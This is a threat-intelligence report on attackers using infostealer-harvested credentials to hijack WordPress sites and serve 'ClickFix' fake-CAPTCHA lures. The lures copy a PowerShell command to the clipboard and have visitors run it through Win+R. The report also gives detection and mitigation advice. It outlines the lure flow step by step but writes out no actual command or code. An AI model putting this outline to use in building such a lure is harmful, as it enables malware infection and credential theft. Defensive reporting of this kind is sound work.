Executive Summary

Research from the Hudson Rock Threat Intelligence Team has uncovered a highly effective and self-sustaining cybercrime feedback loop. Threat actors are weaponizing credentials harvested by infostealer malware (such as Lumma and Vidar) to gain administrative access to legitimate business websites, particularly those running on WordPress. Once in control, they inject malicious code, transforming these trusted domains into hosts for new malware distribution campaigns. These campaigns often use a social engineering technique dubbed "ClickFix," which tricks visitors into pasting and executing malicious PowerShell commands. This creates a vicious cycle: the compromised sites distribute more infostealers, which harvest more credentials, leading to more compromised websites. This tactic allows attackers to abuse the reputation of legitimate businesses to bypass security controls and reach a wider audience of potential victims.

Threat Overview

This trend represents a strategic evolution in the cybercrime ecosystem, moving from simply selling stolen credentials to actively using them to co-opt victim infrastructure. The feedback loop is dangerously efficient:

1. Infection: A user is infected with an infostealer like Lumma or Vidar, which steals credentials saved in their browser.
2. Harvesting: The attacker collects these credentials, which may include logins for a business's WordPress admin panel, cPanel, or FTP server.
3. Compromise: The attacker uses the stolen credentials to log into the business website and inject malicious scripts.
4. Distribution: The now-compromised website is used to host a new malware campaign.
5. Re-Infection: Visitors to the trusted but compromised site are tricked into downloading the next wave of infostealer malware, starting the cycle anew.

Hudson Rock's analysis of 1,600 malicious domains found that 13% were legitimate business sites whose admin credentials had been found in previous infostealer logs, directly confirming this link.

Technical Analysis

The "ClickFix" technique is a key component of the distribution phase.

1. Initial Access (T1078 - Valid Accounts): The attacker uses stolen credentials to log into a website's administrative backend.
2. Defense Evasion (T1562.001 - Disable or Modify Tools): The attacker may modify the site or inject scripts to present a fake security challenge or error message to visitors.
3. Execution (T1059.001 - PowerShell): The compromised site displays a prompt, such as a fake CAPTCHA, instructing the user to fix an issue. When the user clicks a button, a malicious PowerShell command is silently copied to their clipboard (clipboard.writeText).
4. Social Engineering (T1204.002 - Malicious File): The user is then instructed to open the Windows Run dialog (Win+R), paste the content of their clipboard (which they believe is a verification code), and press Enter. This action executes the hidden PowerShell command.
5. Payload Delivery: The PowerShell script then downloads and executes the final payload, which is another infostealer like Lumma or Vidar.

The 'ClickFix' technique is particularly insidious because it bypasses many browser-based security measures. Since the user is manually executing the code via the Run dialog, it is not subject to the same sandboxing and security warnings as a direct file download.

Impact Assessment

• For Hijacked Businesses: Their websites are flagged as malicious, destroying their reputation, tanking their SEO, and getting them blacklisted by security vendors. They may also face legal liability for distributing malware.
• For End Victims: They are infected with potent infostealer malware, leading to the theft of their own credentials, financial data, and personal information, perpetuating the cycle.
• For the Ecosystem: This feedback loop greatly increases the scale and reach of infostealer campaigns, making them more resilient and harder to stamp out. Every victim potentially becomes an unwitting part of the attacker's infrastructure.

Cyber Observables for Detection

• Unusual login activity to website admin panels (e.g., /wp-admin) from unfamiliar IP addresses.
• Unexpected modifications to core website files (e.g., index.php, .htaccess) or the appearance of new, strangely named files.
• Outbound network connections from a web server to known malware C2 domains.

Detection & Response

• File Integrity Monitoring (FIM): Implement FIM on web servers to alert on any unauthorized changes to website files. This can provide the earliest indicator that a site has been compromised.
• Endpoint Detection and Response (EDR): On the client side, EDR is crucial for detecting the execution of suspicious PowerShell commands. A rule that alerts on a browser process spawning a PowerShell script that makes a network connection is a high-fidelity indicator of this attack.
• Log Analysis: Regularly review web server access and error logs for signs of brute-force attacks, SQL injection probes, or successful logins from suspicious locations.

Mitigation

• Multi-Factor Authentication (MFA): The single most effective mitigation. Enforce MFA on all website administrative accounts (D3-MFA: Multi-factor Authentication). This would have prevented the initial compromise, as a stolen password alone would be insufficient for the attacker to log in.
• User Education: Train end-users to be suspicious of unusual website behavior. Specifically, teach them that no legitimate website will ever ask them to copy and paste code into their system's Run dialog or terminal.
• Credential Hygiene: Do not save administrative passwords in web browsers where they can be easily stolen by infostealers. Use a dedicated, secure password manager.
• Website Hardening: Keep all website software (CMS, plugins, themes) up to date. Implement IP-based restrictions for administrative portals, allowing access only from trusted office or VPN IP addresses.